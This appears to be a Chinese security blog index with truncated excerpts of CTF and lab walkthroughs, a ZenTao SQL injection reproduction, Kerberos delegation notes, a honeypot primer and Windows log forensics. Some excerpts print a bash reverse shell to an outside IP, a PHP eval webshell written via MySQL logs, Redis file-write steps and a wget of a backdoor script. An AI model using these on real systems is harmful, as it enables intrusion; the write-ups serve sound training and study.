晴川's Blog🌈

内网渗透-域渗透之委派攻击前置知识在介绍委派之前需要了解Kerberos认证，在前面白银票据和黄金票据哪已经学习过了，这里就简单说一下 委派，委托嘛，就是张三委托小明去做一件事：张三委托小明去拿个快递，委托小明去买水果… 在Kerberos认证系统里，也就是张三委托Web系统，让WEB系统去访问文件系统，去访问图片系统等等，是将域用户的权限委派给服务账号，委派之后，服务账号就可以以域用户的身份去做域用户能够做的事，危害就是攻击者可以利用委派功能结合其他漏洞进行组合攻击，从而获取本地管理员权限甚至域管理员权限。 委派委派是一种域内应用模式，是指将域内用户账户的权限委派给服务账号，服务账号因此能以用户的身份在域内展开活动（请求新的服务等）。 委派包含三种方式： 非约束委派(Unconstrained Delegation, UD) 约束委派(Constrained Delegation, CD) 基于资源的约束委派(Resource Based Constrained Delegation, RBCD) 简而言之，非约束委派是指用户账户将自身的TGT转发给服务账户使用。约束委派通过S ...

ArchetypeWhich TCP port is hosting a database server? 1443 What is the name of the non-Administrative share available over SMB? 1smclient -N -L ip backups What is the password identified in the file on the SMB share? M3g4c0rp123 What script from Impacket collection can be used in order to establish an authenticated connection to a Microsoft SQL Server? 一眼就看出来 mssqlclient.py What extended stored procedure of Microsoft SQL Server can be used in order to spawn a Windows command shell? xp_cmds ...

2025 CSICN&CCB Half-Final本篇转载于N0waybackhttps://mp.weixin.qq.com/s/0e8avtn3o_jZJbh3UDUdzw AWDPWebrng-assistant（Cain、chu0）FIX抽象check脚本，我修泥木 BREAK审计和分析代码后，整体思路如下： 通过/register和/login路由获取session 通过添加 X头，越权访问/admin路由 通过/admin/model_ports路由，将default的端口改为6379，让我们可以执行redis-cli语句 通过/ask路由，进入generate_prompt(question)函数，从而实现模板匹配 审计模板类PromptTemplate，发现缓存机制函数，如果第一次尝试读取模板，那么从文件中读；之后每次读，都是从数据库中 1234567891011@staticmethoddef get_template(template_id):prompt_key = f"prompt ...

TryHackMe-TryHack3M: Bricks Heistflag01What is the content of the hidden .txt file in the web folder? 访问ip会跳转bricks.thm（提前编辑好/etc/hosts） 1nmap -sCV -T4 --min-rate=1000 -O -oN scan bricks.thm 发现存在wordpress wpscan插件扫一扫 使用了bricks主题 尝试搜索相关漏洞https://github.com/Chocapikk/CVE-2024-25600 脚本利用 反弹shell 1bash -c 'exec bash -i &>/dev/tcp/10.21.148.202/9999 <&1' 拿到flag1 flag02What is the name of the suspicious process? 1systemctl list-units --type=service --state=run ...

0402484f73738aba103156847cc03f18e7195a3a4f2c27ca54b557ed675a0fa1510c6e8de4bb779ed2beeff3f81b781f7450a18789ac3ed38bf2c73a4aa9ce8bfcbab06598295e13676db7623abc5750bae0cb0b10fed3635cfd4f7c9d2a50c1be952f0d402f1d92ad198bdbf4bb44a74ab35b62db696b059415f2eef9eccd64b7a8382f724433a7ee5cfc37cb3f7e0fa66a50ef6a5ed99094576c242d949e5d950bce5b2100e04dd3184f0e3593ff6422e16509423729a6e83f182fcc951304f059c8b3ac795f9006d3b9eac5a718192614a36e61b522a93c0892fdccd6e1e0a25626b5a1f59ca4fc1fc6c2c08bd53119fc4da0701d08707 ...

春秋云境-MagicRelayflag01 新版fscan是好看哈(后面发现不咋好用，有些端口不扫) 发现redis版本是3.0.504 MDUT连接 通过文件路径可以看出是windows系统，对于windows下的获取权限的方式，网上并不是很多，但是对于Redis未授权漏洞的利用，其最根本的原理就是写文件的利用，大致有以下几种 1、能够获取web绝对路径的，直接写入webshell 2、写入启动项 3、写入mof、dll劫持等 没有web服务，webshell也就没法写了，启动项的话 windows下的开机启动项的目录为 1C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/startup/ 12config set dir "C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/startup/"靶机无法重启，无法用启动项 这里无法执行 写入MOF 但是 ...

禅道开源版21.4search模块的wordssql注入漏洞前言最近在网上看到了相关漏洞，最近也闲来无事，想着跟着来复现一下。 影响版本<=21.4(禅道开源版最新版) 漏洞复现环境搭建 123dockerpulleasysoft/zentao:21.4mkdirzentao21.4&&cdzentao21.4dockerrun-d-v./data:/data-p8082:80-eMYSQL_INTERNAL=true-eREDIS_INTERNAL=trueeasysoft/zentao:21.4 登录进后台首页后，在右下角的搜索输入框里随便输入，然后访问搜索结果 正常显示没有问题 在word处加入单引号出现报错 发现存在sql注入漏洞， 123456789101112131415sqlmapresumedthefollowinginjectionpoint(s)fromstoredsession:---Parameter:words(GET)Type:error-basedTitle:MySQL>=5.0ANDerror-based-W ...

浅识蜜罐蜜罐是什么？蜜罐蜜罐，从名字上来看就像是一个盛有蜂蜜的罐子，吸引着他人来吃蜜，进来吃蜜了就掉进了陷阱。本质上就是一个设计好的陷阱。放在网安方面来说其实是一种主动防御技术，通过主动的暴露一些漏洞、设置一些诱饵来引诱攻击者进行攻击，从而可以对攻击行为进行捕获和分析。 常见的蜜罐低交互蜜罐（Low-Interaction Honeypot）Honeyd功能：模拟多种服务（如HTTP、SSH、Telnet），可自定义响应规则。 攻击案例：攻击者扫描到一台开放22端口（SSH）的主机，尝试用常见弱密码（如admin:admin）登录，发现登录成功但执行ls命令后返回空目录，且无法上传文件。 判断方法：使用nc连接端口后发送随机数据，观察是否返回固定Banner（如”SSH-2.0-Honeyd”）。 执行uname -a命令，蜜罐可能返回伪造的系统信息（如内核版本与真实系统矛盾）。 Kippo 功能：模拟SSH服务，记录暴力破解和攻击者输入的Shell命令。 攻击案例：攻击者通过SSH连接后尝试执行wget http://恶意IP/backdoor.sh，蜜罐会记录该操作但实际不会下载文 ...

PT-4flag01首先进行信息搜集 密码猜测是root/cyberstrikelab 1select @@plugin_dir 1show variables like 'secure%'; 发现secure_file_priv为空，说明我们没法打udf了 尝试去load_file一下 1234set global general_log ="ON"; #开启日志详解set global general_log_file='C:\\www\\a.php'; #设置路径select'<?php @eval($_POST[123]);?>'; 再次访问发现权限不允许，应该是主机有杀软给杀死了，换个路径写个免杀马 12set global general_log_file='C:\\www\\1.php';select "<?php $a="a"."s"; $b="s".&qu ...

第五章 Windows 实战-evtx 文件分析flag01 将黑客成功登录系统所使用的IP地址作为Flag值提交； 成功登录的事件id是4624查找即可 flag02 黑客成功登录系统后修改了登录用户的用户名，将修改后的用户名作为Flag值提交； 筛选用户账户修改事件： 事件ID 4781 ：记录用户账户名更改，包含旧账户名和新账户名。 检查事件详情中的 New Account Name 字段，即修改后的用户名。 事件ID 4738（非域环境）或 事件ID 4723（域环境）：账户属性修改事件，需确认是否包含用户名变更。 flag03 黑客成功登录系统后成功访问了一个关键位置的文件，将该文件名称（文件名称不包含后缀）作为Flag值提交 *定位文件访问事件**： 事件ID 4663 （文件/文件夹访问）： 检查 Object Name 字段，显示文件完整路径（如 C:\KeyFiles\secret_2023.txt）。 事件ID 4656 （文件系统操作请求）： 若启用了详细文件审核策略，可辅助验证访问行为。 flag04 4.黑 ...